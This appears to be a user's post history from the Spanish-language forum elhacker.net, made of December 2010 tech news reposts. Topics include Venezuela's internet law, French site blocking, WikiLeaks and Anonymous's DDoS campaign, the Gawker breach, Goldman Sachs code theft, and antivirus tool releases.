"Fomenten zozobra en la ciudadanía o alteren el orden público, induzcan al homicidio, constituyan propaganda de guerra y desconozcan a las autoridades legítimamente constituidas".

Las prohibiciones han sido consideradas por muchos como amplias y poco claras – la definición de cuándo un mensaje es ofensivo, violento o "desconoce" a una autoridad pública puede ser bastante subjetiva. Por ende, se teme que con esto se genere autocensura de parte de los medios, que evitarían referirse a ciertas cosas por temor a las sanciones.

Pese a las protestas que se llevaron a cabo en redes sociales y otros medios (a través del hashtag #SOSinternetVE y los movimientos Internet Prioritaria y Todos en Red), llamando a los partidos políticos a rechazar la ley, el proyecto fue aprobado por los parlamentarios, que pertenecen en su mayoría al bloque oficialista.

La nueva ley, que para entrar en vigencia sólo necesita la firma del mandatario y ser publicada en el Diario Oficial, establece que "los proveedores de medios electrónicos deberán establecer mecanismos que permitan restringir, sin dilaciones, la difusión de mensajes divulgados que se subsuman en las prohibiciones contenidas en el presente artículo (27), cuando ello sea solicitado por la Comisión Nacional de Telecomunicaciones en ejercicio de sus competencias".

Esto implica que los ISP y los medios que no cumplan con las indicaciones podrán ser multados por abultadas sumas.

Aunque el gobierno de Chávez niega que esta ley coarte la libertad de expresión y que busca "velar por la integridad de la población", muchos temen que Venezuela se esté encaminando hacia un tipo de censura similar al que existe en Cuba o China.

Fuente:http://www.fayerwayer.com/2010/12/venezuela-aprueba-ley-para-restringir-internet/
#23
Buenas,

Hoy vengo a comentar (informar) la salida de la versión 2.0 final de PSI (Personal Software Inspector), programa que en otras oportunidades ha sido mencionado en el boletín mensual de elhacker.net

Esta aplicación se instala en nuestras pc y se encarga de monitorizar y alertar de programas desactualizados y/o vulnerables instalados en nuestro sistema y proporcionar posibles soluciones, claro esta que también podemos quitarlo del inicio y simplemente utilizarlo para alguna revisión esporádica del sistema, lo cual no nos llevará más de un par de minutos y nos ayudará a tapar posibles "huecos" que nos estemos dejando.



Personalmente es una aplicación que había utilizado en anteriores versiones pero que había olvidado luego de haber formateado, así que ahora me "tira de las orejas" notificandome de que la versión de VMWare que utilizo tiene un fallo :-X
Por último y no menos importante, es gratis ;D , así que dejo link donde se puede encontrar algo más de información y descarga:
http://secunia.com/vulnerability_scanning/personal/

Saludos
#24
El Gobierno francés podrá ordenar el bloqueo de sitios de Internet  sin necesidad de obtener una autorización judicial. Esta medida, dentro del proyecto de ley Loppsi, fue votada en la asamblea francesa y ganó la propuesta gubernametal a pesar de la discrepancia de algunos diputados de la mayoría. Para perseguir los sitios pedófilos o cibrecriminales, el Gobierno elaborará una lista negra que trasladará a los operadores para que bloqueen el acceso de los internautas a los mismos en territorio francés. La medida, pensada para combatir el acceso de sitios ubicados en otros países, fue criticada por los oponentes a la misma por dos razones: su ineficacia y el peligro de que el bloqueo se extienda a otros sitios por razones de otro tipo, particularmente políticos.

Los diputados que se opusieron a este artículo argumentaron que los recursos de la cibercriminalidad son muy importantes y no los frenará el bloqueo local de sitios de Internet. El verdadero remedio es lograr una acción internacional que permita el cierre de los servidores en el país donde están albergados. Por otra parte, la experiencia de listas negras en otros países, como Australia, ha demostrado que su elaboración es muy compleja y acaba afectando a sitios que no tiene nada que ver con la pedofilia o el cibercrimen. En Australia se llegó a bloquear el blog personal de un dentista. Preocupa, además, que todo ello se haga sin necesidad de control judicial.

La misma ley, en otro artículo contempla penas de dos años de prisión y multas a quien usurpe una identidad en Internet.

Tasa Google

Por el contrario, en el debate presupuestario, se ha aplazado seis meses la entrada en vigor de una tasa sobre la publicidad en Internet. El Gobierno, ante el alud de críticas recibidas, ha postergado su implantación para poder seguir negociando. Mal llamada tasa Google porque pretendía conseguir la percepción de impuestos sobre la actividad publicitaria de compañías con la sede social en otro país y que, por tanto, escapan al fisco francés, la solución es perversa. En lugar de grabar a las empresas que recibían la publicidad lo hacía a las empresas, localizadas en Francia, que la encargaban lo que, según un manifiesto de las compañías afectadas, conducía a una paradoja: perjudicar la competitividad de las compañías locales y dejar inmunes a las multinacionales con sede en otro país.

Fuente:http://www.elpais.com/articulo/tecnologia/Francia/bloqueara/sitios/Internet/permiso/judicial/elpeputec/20101216elpeputec_8/Tes
#25
Las presiones que recibe el sitio de filtraciones -Wikileaks- suman y sigue; Primero su creador fue acusado falsamente de violación y acoso sexual, luego Amazon expulsa al sitio de su gran nube dejandolos sin hosting, posteriormente Paypal cancela la cuenta donde recibían donaciones, y ahora el último golpe bajo lo recibe desde el sitio Spamhaus, que tiene la misión de rastrear bloques de IP que puedan contener malware u otros elementos peligrosos para nuestros computadores.

El día de ayer, Spamhaus anunció que el dominio principal de Wikileaks (www.wikileaks.org) estaba redirigiendo su trafico a mirror.wikileaks.info, sub-dominio que está alojado en un "temido vecindario" conocido como Webalta, una red de hackers de sombrero negro que es controlada por el cibercrimen ruso. El bloque de IP 92.241.160.0/19 (perteneciente a Webalta) ha estado en la lista negra de Spamhaus desde Octubre del 2008 por la peligrosa actividad registrada en los sitios alojados bajo dicho espacio de direcciones.

Wikileaks se defiende de las acusaciones de Spamhaus, asegurando que wikileaks.info es monitoreado constantemente en busca de malware y garantizan que no se ha encontrado nada. Además, encuentran perturbante que los etiqueten de un sitio peligroso sólo por el lugar donde están alojados, cosa que no ha pasado con otros website politicos como castor-schottern.org que también están acogidos en Webalta o Heihachi Ltd como se le conoce formalmente.

Para la seguridad de todos, Wikileaks.info es seguro y limpio, sino preguntenle a Google o stopbadware.org (Base de datos usada por Firefox).

Al menos sabemos que Wikileaks estará segura en los servidores rusos de mala fama, pero que no caen fácilmente ante presiones de gobiernos o de otra índole.

Fuente:http://www.chw.net/2010/12/wikileaks-se-defiende-luego-de-ser-etiquetados-como-sitio-inseguro-por-spamhaus/
#26
Existe hoy todavía quién mira mal a las redes. No me refiero sólo a las redes sociales, me refiero a las redes en general. Miedo a lo desconocido supongo que es lo que ocurre en la mayoría de los casos. Ayer hubo mucho revuelo durante la comparecencia de Julian Assange en la audiencia. El juez Howard Ryddle, de manera espontánea, rompió con años de "clasicismo" durante el juicio, permitiendo la utilización de los móviles para utilizarlos como herramienta informativa de lo que allí acontecía. Twitter evidentemente se convirtió en la cara de lo que ocurrió. El periodista Jim Sciutto, de la ABC, fue el primero (o el más rápido) en informar sobre la libertad bajo fianza a Assange vía Twitter. A partir de ahí, el movimiento que realizó el juez fue tachado por muchos de "modernez", otros lo calificaron como histórico, y finalmente la alta jurídica británica afirma estar planteándose si abrir por completo Twitter y los dispositivos móviles a las sesiones. Hasta el día de ayer y como norma habitual, jamás se daba permiso para el uso de estos o material que pudiera grabar.

Personalmente y de ocurrir así, tengo mis dudas de que Twitter no pudiese entorpecer un proceso jurídico (o al menos alguno), muchas veces lleno de matices y más teniendo en cuenta que durante un proceso se tratan muchos temas hasta que concluye. La llegada de una herramienta así puede dar lugar a confusiones durante un juicio, malas interpretaciones del informante o información sesgada que no ayudaría en nada al proceso. Contar lo que acontece en el mismo momento que ocurre la noticia es el arma de Twitter, entrar en un juzgado o una corte y narrarnos los entresijos de un caso paso a paso, al minuto, es otra muy distinta.

Hasta ahora, en el Reino Unido los tribunales se mostraban rígidos e inflexibles ante la aparición de cualquier dispositivo. Los informantes debían acudir sin ningún tipo de "extra" móvil, teniendo que volcar en el papel o el ordenador portátil el desarrollo del juicio. En caso contrario, y de encontrar algún móvil, podían incurrir en desacato al Tribunal.

El caso que se trató ayer era de un calado gigante. No era un simple juicio, sino una bomba informativa de la que todos los medios estaban atentos. Los segundos contaban y el más rápido tendría una gran ventaja entre los lectores ávidos. Es quizá por esta razón, comprendiendo la situación de los acontecimientos, por lo que el propio juez admitió la utilización de las redes.

Las valoraciones que se hacen ahora para su aplicación en juicios tienen que ver con los principios de la Justicia. ¿Es diferente un Tweet de un correo electrónico? ¿Un portátil de un móvil? Desde luego, como informante vienen a ser lo mismo. Aunque pienso que debido a la inmediatez de una herramienta como Twitter, debe usarse en según qué situaciones. Como decía al principio, la implantación de las tecnologías cuesta en muchos ámbitos, ya sea por miedo o por desconocimiento. Un mal uso le haría un flaco favor a su desarrollo. Eso no quita que la evolución y el desarrollo modifique las normas establecidas.

Ocurre algo parecido con los vuelos en España. Aún hoy, cuando nos montamos en la mayoría de aerolíneas que aquí operan, nos indican que debemos mantener desconectados todos los móviles durante el vuelo, cosa que no ocurre con el resto de aparatos electrónicos, que sólo deben mantenerse desconectados en el despegue y aterrizaje.

En este caso es curioso, ya que fue Industria quien autorizó su uso y reguló el servicio en vuelos por el mes de julio. Hasta ese momento suponíamos que una grave interferencia podría acabar cruzando datos y desestabilizar el contacto entre la cabina de control y el aeropuerto. La razón no la tengo clara. Manías del pasado, miedo a cambiar las reglas o imposibilidad de que se pongan de acuerdo la MCA y las aerolíneas. El caso es que hoy por hoy, tampoco podemos lanzar un tweet o un check-in desde espacio aéreo español.

Fuente:http://bitelia.com/2010/12/httpwpmep12tgv-kwk
#27
Seguridad / Test Performance Antivirus
15 Diciembre 2010, 16:08 PM
Buenas,

Bueno, viendo algún comentario sobre el impacto que tienen los AV sobre el sistema, dejo links a dos test realizados por av-comparatives.

Comparativa de Suites (agosto)
http://www.av-comparatives.org/images/stories/test/performance/performance_aug_2010_en.pdf

Comparativa de Antivirus (diciembre)
http://www.av-comparatives.org/images/stories/test/performance/performance_dec_2010.pdf

Que cada cual saque sus propias conclusiones, actualmente en la pc que uso a diario tengo el Bitdefender Security Suite y en el test queda por los suelos :xD , pero en mi pc no noto que realmente influya en el rendimiento, y eso que hablamos de un core2duo P8400 con 4 gigas de RAM.

Algo que también resulta llamativo es el rendimiento del Panda :o , apuesto a que la mayoría recuerda al oso panda glotón come recursos, y ahora esta entre los más rápidos :o

Saludos

P.d: textos en inglés
#28
El portal Gawker ha comunicado en su página web que sus bases de datos han sufrido un ataque de hackers y recomiendan a sus usuarios cambiar sus contraseñas. Durante el ataque, los hackers recopilaron datos de acceso a Twitter de los usuarios para después usarlos en mensajes de spam bajo el nombre de 'Acai Berry'.

Los ataques se han producido este fin de semana. Desde Gawker se asegura que sus bases de datos han estado comprometidas, lo que supone que los hackers han tenido acceso a los datos de los usuarios. En el ataque se podrían haber sustraído los nombres y contraseñas de los usuarios para acceder a redes sociales como Twitter y a servicios como el Wall Street Journal. Las bases de datos de Gawker contienen información de más de un millón de usuarios, por lo que la filtración de información puede ser muy importante.

La compañía asegura que las claves encriptadas no han sido afectadas, pero recomienda cambiar los datos para evitar posibles problemas. "Las contraseñas encriptadas no, pero las simples pueden ser vulnerables a un ataque. Se debe cambiar la contraseña en Gawker y en cualquier otro sitio en el que se ha utilizado la misma contraseña" han publicado en su web.

Las carencias en materia de seguridad en una empresa con tantos usuarios son especialmente graves. Desde la compañía se muestran avergonzados y aseguran que trabajarán para mejorar. "Estamos profundamente avergonzados por este fallo. No debemos depender de la buena voluntad de los hackers, que han identificado las deficiencias en nuestros sistemas" han comentado.

Una de las posibles consecuencias del robo de datos puede ser los recientes envíos de mensajes de spam a través de Twitter. Al parecer los hackers habrían usado las cuentas sustraídas para difundir el mensaje 'Acai Berry' a través de esta red. Twitter avisa desde su página de la propagación de este mensaje de spam y su posible vinculación con los ataques sufridos por Gawker.

La propagación del mensaje 'Acai Berry' está siendo muy rápida, llegando a los 10.000 tweets al minuto según Mashable. Al parecer al acceder a la información del mensaje se da acceso a los datos de usuario y contraseña y se reenvía el mensaje a otros usuarios. Se recomienda a los usuarios afectados que cambien su contraseña para terminar con el problema.

Fuente:http://www.20minutos.es/noticia/900917/0/spam/twitter/gawker/
#29
La relación entre la Apache Software Foundation y Oracle parece la de un matrimonio mal avenido, y Java, parece el hijo del cual se disputan la custodia. Si hace poco más de un mes, ya comentamos los primeros roces entre Apache y Oracle en los que la fundación amenazaba al gigante Oracle con marcharse del comité ejecutivo del Java Community Process, algo que finalmente cumplió el pasado jueves, tras un anuncio realizado por Apache. La verdad es que no sorprende este anuncio, era algo que esperábamos, sin embargo, si la amenaza incial nos parecía algo infantil, los hechos posteriores a este anuncio no se quedan atrás.

A principios de semana, el comité ejecutivo de Java aprobaba las especificaciones para Java SE 7 y Java SE 8, sin embargo, Apache ya amenazó que se marcharía si Oracle no relajaba las restricciones alrededor del TCK de Java (Technology Compatibility Kit), que es precisamente lo que utiliza la fundación para desarrollar su propia versión libre de Java (Harmony). Así que dicho y hecho, Apache anunció su salida del comité y, por tanto, del proyecto Java dentro del seno de Oracle.

En primera instancia, Oracle no realizó ningún tipo de movimiento ni respuesta, primero ante la amenaza y luego ante el abandono, pero al día siguiente del comunicado, el culebrón continuaría con Oracle pidiéndole a Apache que volviese al comité de Java. El primer movimiento ha sido realizado por el vicepresidente de desarrollo de la compañía, Adam Messinger, que pretende acercar posturas con una postura conciliadora y tratar que Apache vuelva de nuevo al comité mediante un comunicado oficial:

"El mes pasado, Oracle volvió a nombrar a Apache miembro del comité ejecutivo de Java porque valoramos su participación activa y su visión sobre Java. Oracle tiene la responsabilidad de soportar Java y mantener la uniformidad del estándar de Java para los millones de desarrolladores que existen, algo en lo que estamos de acuerdo la mayoría de los miembros del comité ejecutivo. Animamos a Apache a que reconsidere su posición y continúe formando parte del proceso de evolución y soporte de Java. La Apache Software Foundation y muchos otros proyectos de software libre son una parte muy importante del ecosistema de Java."

Ante esta invitación, Apache ha respondido, pero no en los términos que esperaba Oracle. La respuesta llegó a través de Twitter, mediante un mensaje de Jim Jagielski, el presidente de la fundación:

"Dadnos una razón por la que la Apache Software Foundation debería reconsiderar otra cosa que no fuese un "por favor"

Visto el panorama, parece que las diferencias son irreconciliables. Si bien Oracle está tendiendo la mano para que Apache vuelva, no parece que vaya a relajar sus pretensiones, al menos, sobre eso no indican nada en el comunicado y se centran, básicamente, en ensalzar a Apache. Para Apache, la colaboración con Java está ya en vía muerta, según un post de su presidente, Java no es más que un zombie que va deambulando por las calles, así que, previsiblemente, Apache se centrará en el desarrollo de Harmony en cuerpo y alma.

No creo que este sea el fin de esta historia, tanto Oracle como Apache tienen mucho que decir y, posiblemente, muchas cosas de las que se digan no van a ser nada bonitas. Además, viendo la demanda de Oracle a Google por usar Java en Android, no me extrañaría nada que Apache y Oracle terminen en los tribunales, como punto y final del culebrón.

Fuente:http://bitelia.com/2010/12/oracle-y-apache-java-ni-contigo-ni-sin-ti
#30
Han pasado tantas cosas con Wikileaks que poco se ha hablado de cómo se obtuvieron todos esos cables. Alguien debe haberlos sacado de alguna parte. Bueno, el ejército de Estados Unidos lo pensó y ya tiene una solución: no más formas de almacenamiento de información que se puedan transportar.

Esto viene en respuesta no sólo a la filtración de cables del Departamento de Estado sino que también se relaciona con las filtraciones de Afganistán e Irak, de julio y septiembre respectivamente. Por ejemplo, la filtración de documentos sobre la guerra en Afganistán fue hecha (supuestamente) por un joven llamado Bradley Manning, que mientras servía en el ejército iba a los computadores con un CD regrabable que decía "Lady GaGa", pero con el que realmente estaba sacando documentos secretos. Y para hacerlo creíble, cantaba.

Según Wired, una nueva directriz titulada "Cyber Control Order" fue enviada por el General Richard Webber, de la oficina de Operaciones de red de la Fuerza Aérea, diciendo que

"Todos los pilotos deben dejar el uso de medios removibles en todos los sistemas, servidores y máquinas que forman parte de SIPRNET."

Aunque en la carta de reconoce que habrá dificultad para transportar información para necesidades operacionales, lo que podría afectar el cumplimiento a tiempo de ls misiones, dice que quien no obedezca la orden será "castigado con la sentencia de una corte marcial". La orden califica como "medios removibles" a CDs, DVDs, pendrives USB y otras formas para transportar y almacenar datos.

Fuente:http://www.fayerwayer.com/2010/12/ejercito-de-ee-uu-responde-a-wikileaks-¡no-mas-pendrives
#31
Hace más de un año les contamos sobre las High-frequency trading (HFT), programas utilizados por grandes compañías financieras que transan en las más importantes bolsas a nivel mundial. Fue precisamente una de estas compañías, Goldman Sachs (GS) la que sacó a la luz el tema en ese tiempo, luego de que acusaran a un ex-empleado de haber sacado copias de dichos programas desde los sistemas computaciones de la entidad.

Los programas de HFT utilizan complejas fórmulas algorítmicas para realizar una gran cantidad de transacciones de compra y/o venta de acciones en cosa de milisegundos y que, por lo tanto, persiguen generar importantes ganancias a las compañías que los utilizan (de ahí su elevado precio y el secretismo que los rodea).

Volviendo al caso de GS la investigación en torno al robo del parte del código fuente utilizado por la compañía finalizó declarando como culpable de robo de secretos comerciales a Sergey Aleynikov (40 años), quien deberá permanececer bajo arresto domiciliario y con vigilancia electrónica hasta que se emita su sentencia en marzo del próximo año (arriesga pasar los próximos 15 años detrás del las rejas).

La historia detrás del caso de Aleynikov se remonta al año 1998, cuando evaluó abandonar GS luego de recibir una oferta de trabajo de recibió una oferta de trabajo de USB AG. Sólo una contraoferta de US$ 400.000 al año lo mantuvo trabajando en GS, convirtiéndolo en uno de los programadores mejor pagados de la entidad.

Claro que un año más tarde el inquieto Aleynikov volvió a recibir una oferta de trabajo de la compañía Teza Technologies, con quienes negoció un paquete de remuneraciones con un salario anual base de US$ 300.000, una bonificación garantizada de US$ 700.000 y una participación en las ganancias de US$ 150.000.

Acordado el cambio de empleador Aleynikov ideó un complejo sistema que le permitiera saltarse los procedimientos de seguridad de GS, diseñando un programa para descargar miles de archivos sin ser detectado. Durante su último día de trabajo en GS (5 de junio de 2009), Aleynikov se preocupó de eliminar cualquier rastro de sus actividades y luego se fue a celebrar con sus compañeros su partida.

Sólo a fines de ese mismo mes en GS se percataron de las actividades realizadas por Aleynikov, iniciándose una investigación en los sistemas de la compañía que concluyo en la presentación de una denuncia formal ante las autoridades federales.

Aleynikov fue arrestado el 3 de julio de 2009, luego de regresar de una reunión con su nuevo empleados (Teza) en Chicago. En ese momento llevaba en su computador portátil y en una memoria portátil parte del código fuente sustraído de GS.

En su primera declaración ante los agentes Aleynikov señaló que su idea era sólo copiar partes del código de fuente abierta de GS y que, al parecer, durante ese proceso también se copió código fuente patentado sin que se diera cuenta.

Claro que la investigación determinó que Aleynikov le había realizado unos cambios cosméticos al código fuente robado, con la finalidad de incorporarlo a un nuevo sistema que sería implementado en Teza. Claro que a esta compañía le abría ocultado su ilícito origen haciéndolo pasar como de su propia cosecha.

Desde Teza han salido a defenderse señalando que ellos nunca le ha pedido a ninguno de sus empleados que utilicen código perteneciente a otra empresa, lo que al parecer ha quedado demostrado durante la investigación.

Fuente:http://www.fayerwayer.com/2010/12/ex-empleado-de-goldman-sachs-arriesga-15-anos-de-carcel-por-robo-informatico
#32
Noticias / Amazon llegará a España en breve
10 Diciembre 2010, 13:58 PM
Amazon llegará por fin a España, presumiblemente el próximo mes de enero. Tras la compra en octubre de BuyVip, Amazon se extenderá por varios países europeos, entre los que se encuentra España. Además, ha confirmado el nombre de la directora general de BuyVIP, Koro Castellano, desde donde llevará a cabo todas las operaciones de la mayor tienda de libros en la red del mundo y futuros proyectos para el 2011.

Tras la compra de BuyVIP por 70 millones de euros, la compañía tendrá por fin alojamiento en tierras españolas y se unirá al resto de países donde ya opera la compañía: Estados Unidos, Reino unido, Alemania, Francia, Canadá, Japón, Holanda y Polonia.

Koro Castellano era hasta hace dos meses la directora general de Tuenti, la red social española líder. En su trayectoria también había trabajado en diferentes medios digitales como El Mundo, Marca o Expansión. Pocos datos más tenemos por ahora, no sabemos si finalmente traerán una sede con oficinas en España o si por el contrario se limitarán a abrir su tienda online en español. De lo que si estamos seguros es de que se trata de una buena noticia para los usuarios españoles.

Fuente:http://bitelia.com/2010/12/amazon-llegara-a-espana-en-breve
#33
Noticias / OpenLeaks: la evolución de WikiLeaks
10 Diciembre 2010, 11:52 AM
Las últimas semanas fueron intensas para WikiLeaks: desde que comenzó el cablegate, perdió su dominio, se le cortaron las fuentes de financiamiento y hasta fue detenido su fundador, Julian Assange. Si bien la información ya está a salvo, gracias a cientos de espejos en todo el mundo, ¿cómo es posible mantener a futuro este modelo que revela los secretos del poder?

A partir del lunes, quizás encontremos la respuesta en OpenLeaks, creado por antiguos colaboradores del sitio, que ya estaban cansados del estilo de dirección verticalista impuesto por Assange y sus crecientes problemas personales. La idea es continuar con la misma filosofía de WikiLeaks, pero evitando la persecución por parte de los gobiernos.

Sus fundadores, quienes prefieren permanecer en el anonimato, contaron a DN.se que esta nueva web también será un vínculo entre los informantes y el público. La diferencia principal es que OpenLeaks no publicará la información directamente, sino que la cederá a distintos medios para que éstos la analicen y distribuyan.

El objetivo es que la organización, comparable a una agencia de noticias, se convierta en un intermediario neutral y sin agenda política definida. De esta manera, también se corre el foco de la filtración en sí, hacia lo que verdaderamente importa: el contenido de cada uno de los cables.

Los creadores destacan que, por la manera en que está diseñado el proyecto, la responsabilidad por el material recaerá sobre quienes lo publiquen finalmente. Además, creen que el enojo de los políticos ante cada revelación hecha por los medios tradicionales, será menor que el generado hoy por WikiLeaks, aún cuando los datos sean del mismo tenor. Yo pienso lo mismo.

Fuente:http://bitelia.com/2010/12/openleaks-evolucion-wikileaks
#34
Twitter ha salido a la palestra a explicar por qué dos asuntos que estaban en boca de buena parte de sus usuarios en los últimos días no llegaron a ser "Trending Topic": #WikiLeaks y #CableGate. Mientras, otros asuntos más secundarios sí aparecían entre los temas más en boga en ese momento. Muchos usuarios gritaron "¡Twitter está censurando!", lo que era sistemáticamente negado en la cuenta oficial.

Así que desde Twitter han tenido que publicar un artículo sobre cómo funciona el algoritmo que rige los Trending Topics, para aclarar de una vez por todas por qué esos términos no aparecían en la lista, a pesar de que se estima que el uno por ciento de todos los tweets mencionaban #WikiLeaks durante la jornada del 6 de Diciembre, mientras que los que sí figuraban ni de lejos llegaban a semejante proporción.

El resumen es muy sencillo: Los Trending Topics valoran más la novedad que la cantidad. Si se habla mucho de un tema (por ejemplo, "Navidad"), es menos probable que un repunte en el uso de esa expresión la sitúe en el top de los temas candentes. Sin embargo, una nueva etiqueta, surgida de forma espontánea, sí tiene más papeletas, como sucedió con "#FreeAssange" (que apareció en la lista en apenas unos minutos tras entregarse Assange a la policía) o como el caso de "Operation Payback", que en el momento de publicar este artículo cierra la lista global.

Twitter explica que el algoritmo trata de mostrar los temas de los que se habla en este momento mucho más que antes, con el fin de descubrir nuevos temas, o noticias de impacto en tiempo real. Como de #WikiLeaks y de #CableGate ya se venía hablando bastante con anterioridad, lo tenían mucho más complicado para aparecer en esta lista. De hecho, lo suyo era que no aparecieran, puesto que la gente ya conocía de su existencia: la lista es para descubrir temas nuevos.

Es más, pensadlo fríamente: si sólo se valorara la cantidad de tweets sobre un tema, Justin Bieber o la Saga Corpúsculo estarían permanentemente en la lista. El horror.

Si queréis más información sobre los pormenores de WikiLeaks y del caso CableGate, nuestros compañeros de Nación Red se están dejando los dedos en el teclado para comentar todo lo que va surgiendo.

Fuente:http://www.genbeta.com/actualidad/twitter-explica-por-que-ni-wikileaks-ni-cablegate-fueron-trending-topic
#35
Seguridad / Avira Rescue System 3.7.16 (live-cd)
8 Diciembre 2010, 01:20 AM
Buenas

Simplemente para comentar que ha salido una renovada nueva versión del live-cd antivirus de Avira. Viene en 11 idiomas incluído el español, y tiene varias opciones de configuración más.

También hay que agregar que a diferencia de versiones anteriores donde por defecto solo alertaba de las detecciones, ahora intenta limpiar y sino renombra, aunque obviamente también se puede configurar para eliminar :D

   
   

Este AV es de mis favoritos, así que el live-cd lo tengo siempre a mano por si acaso :P

Anuncio y descarga

Saludos
#36
Piratas informáticos bloquean la web del banco suizo que cerró la cuenta de Wikileaks

Anonymous, el mismo grupo que lanzó el pasado mes de octubre ataques coordinados a escala mundial contra instituciones de protección de derechos de autor como la SGAE, ahora ha cerrado filas en torno al autor de Wikileaks, Julian Assange. Su última acción ha sido bloquear la página de Internet del banco postal suizo, PostFinance, después de que la entidad cerrase el lunes la cuenta de Assange.

El portavoz de PostFinance señaló a la agencia de noticias suiza ATS que la página de Internet de esta entidad se encuentra bloqueada desde las 22.30 horas (21.30 GMT) del pasado lunes, en un "ataque" que relaciona al cierre de la cuenta de Assange. La entidad helvética informó de que intenta recuperar lo antes posible el funcionamiento normal de su página de Internet, después de que el bloqueo haya generado numerosas quejas de sus clientes.

PostFinance, el brazo financiero de Correos de Suiza, decidió el cierre de la cuenta del fundador de WikiLeaks abierta para recibir donaciones de los seguidores de su sitio web tras conocerse que PayPal, a través del cual WikiLeaks recibía financiación, había optado asimismo por cerrar su cuenta.

En un manifiesto, el grupo Anonymous afirma no tener ninguna relación con el sitio web ni su autor, pero le apoyan porque ambos "defienden los mismos principios: la transparencia y la anticensura".

Una cadena de ciberataques

Hasta el momento, la empresa de seguridad PandaLabs ha registrado tres ataques realizados por los piratas informáticos de Anonymous. Los dos primeros fueron contra PayPal y su blog, por retirar las donaciones a Wikileaks, que ha dado como resultado más de 8 horas de interrupción del sitio web y los servicios del conocido sistema de pago.

El ataque contra PostFinance ha sido el tercero. El resultado, hasta el momento, son más de 11 horas de falta de servicio. Los usuarios incluso pedían a través de Twitter a los ciberactivistas que pararan al menos 10 minutos para poder utilizar los servicios online del banco.

Durante los ataques de la jornada del lunes, su propio sitio, el cuartel general del grupo Anonymous, ha sido atacado también por DDoS (ataques de denegación de servicio), por lo que estuvo inactivo durante algunas horas.

En las próximas horas y días, Anonymous planea seguir con su apoyo al autor de Wikileaks, atacando a todo objetivo que se posicione contra Julian Assange. Han amenazado a Twitter, por censurar supuestamente las conversaciones acerca de Wikileaks (marcados con el hashtag #wikileaks), aunque de momento no se ha registrado actividad ninguna.

Fuente:http://www.20minutos.es/noticia/896271/0/piratas/wikileaks/suiza/
#37
Un intento flagrante de piratería ocurrido a Avast resultó en una oportunidad para la compañía checa y un interesante experimento del cual podemos sacar algunas lecciones.

Resulta que una licencia de la suite de Avast Pro que fue adquirida por una pequeña empresa de 14 empleados de Arizona, EE.UU., terminó activando nada más ni nada menos que 774.651 licencias alrededor del mundo. Una vez que Avast se dio cuenta de la situación, lejos de banear inmediatamente la autorización de la licencia de sus servidores, decidieron ver qué tan lejos llegaban los piratas informáticos alrededor del mundo por más de un año y medio y qué tan eficientes eran las redes de intercambio.

Resultó que la licencia fue usada en 200 países del orbe incluyendo dos computadores del Vaticano.

Lyle Frink, vocero de Avast agrega que "Fue muy interesante cuán rápido se propagó, pero en algún punto la fiesta tenía que terminar".

La compañía, contrario a muchas otras, no pretende perseguir a los usuarios de ojo parchado, más bien lo tomó como una oportunidad, adicionando a la licencia un aviso que aparece de vez en cuando en todos los PCs donde el software está instalado, la cual les ofrece un link a la versión gratuita o que se pasen a la pagada como debiera ser.

Lógicamente no se sabe cuántos piratas se han "evangelizado" pero el vocero asegura que son varios. "Todo va de acuerdo al plan", finaliza. Notable.

Por otro lado la licencia de la compañía de Arizona fue reemplazada y los aconsejaron de mantenerla en un lugar seguro.

¿Eres alguno de aquellos que cayeron trampa del experimento? Es tu oportunidad de redimirte, pirata, ¡HAR HAR HAR!

Fuente:http://www.chw.net/2010/12/experimento-sobre-pirateria-de-avast-arroja-sorprendentes-resultados/
#38
Noticias / Google presenta Android 2.3 Gingerbread
7 Diciembre 2010, 13:35 PM
Hace unas horas que Google ha anunciado dos grandes, y esperadas, novedades que harán furor esta semana y, previsiblemente, estas navidades. Asistimos a la presentación de la nueva versión de Android, la 2.3 (Gingerbread) y, de paso, la salida al mercado de un nuevo terminal de la serie Nexus, el Nexus S, fabricado por Samsung y que podemos revisar en ALT1040, terminal que, me da la sensación, se convertirá en uno de los más solicitados estas navidades porque, la verdad, es que aparenta no estar nada mal.

Por cierto, el nuevo Nexus S no estará disponible hasta el próximo jueves 16 en Estados Unidos y hasta el día 20 en Reino Unido. Me temo que los demás tendremos que esperar o comprarlo por internet si queremos estrenarlo en estas navidades.

Volviendo a la nueva versión de Android, Android 2.3 Gingerbread, no creo que defraude a todos los desarrolladores, y fans en general, que la estaban esperando, si bien, Gingerbread no estará disponible como software libre hasta dentro de unas semanas. Entre sus novedades encontramos:

  • Más rápido e intuitivo, mejorarando la entrada de texto y el teclado táctil, además de mejorar el multi-touch, lo que permitirá a los usuarios escribir algo más rápido.
  • Interfaz de usuario más simple, con los menús y las opciones algo más accesibles y fáciles de encontrar.
  • Funciones para copiar y pegar texto con un solo toque en la pantalla, algo similar a lo que podemos hacer con el iPhone.
    *Mejor gestión de la batería, lo que dotará a los terminales de mayor autonomía. Las apps se cerrarán automáticamente si comienzan a acaparar uso de la CPU del terminal y los usuarios podrán visualizar en un listado las aplicaciones que más están penalizando la autonomía del teléfono.
  • Nuevas vías de comunicación (al fin y al cabo, estamos hablando de un sistema operativo para terminales móviles) incluyendo VoIP o Videollamadas.


Fuente:http://bitelia.com/2010/12/google-presenta-android-23-gingerbread
#39
Ahora sí que les tocará bien dura a los pedófilos y distribuidores de material pornográfico infantil en el mundo. Porque durante el 2011 los casi 1,8 petaflops del supercomputador más poderoso de Estados Unidos (y segundo en el mundo detrás del Tianhe-1A chino) pondrán un millón de horas de procesamiento al servicio del rastreo y captura de este tipo de abusadores.

El Cray XT Jaguar hasta hace algunas semanas era la máquina que realizaba la mayor cantidad de operaciones de punto flotante por segundo, está emplazado en Oak Ridge, Tennessee, lugar hasta donde acudió Grier Weeks, director ejecutivo de la Asociación Nacional para Proteger Niños (Protect) para obtener ayuda en su lucha por desarticular redes de distribución de videos e imágenes de abuso sexual a menores. Los científicos computacionales accedieron de inmediato a cooperar con dicha entidad.

De hecho, el investigador jefe de Oak Ridge, Robert Patton, ya desarrolló una serie de algoritmos que analizan el tráfico P2P, marcan búsquedas de pederastia y ven la cantidad de direcciones IP que responden a las indagaciones. Más adelante, los investigadores esperan poder determinar de dónde proviene exactamente el material ilícito rastreado.

Ojalá le salve la vida y la inocencia a muchos niños, de paso arrestando a quienes están detrás de estos delitos. Además, la gente relacionada al proyecto aclara que se trata no se trata de un proyecto de caridad, sino de investigación.

Fuente:http://www.fayerwayer.com/2010/12/junten-miedo-pederastas-supercomputador-jaguar-ira-de-caceria-tras-ellos
#40
WikiLeaks podría demostrar las presiones de EEUU al Gobierno para aprobar la Ley Sinde

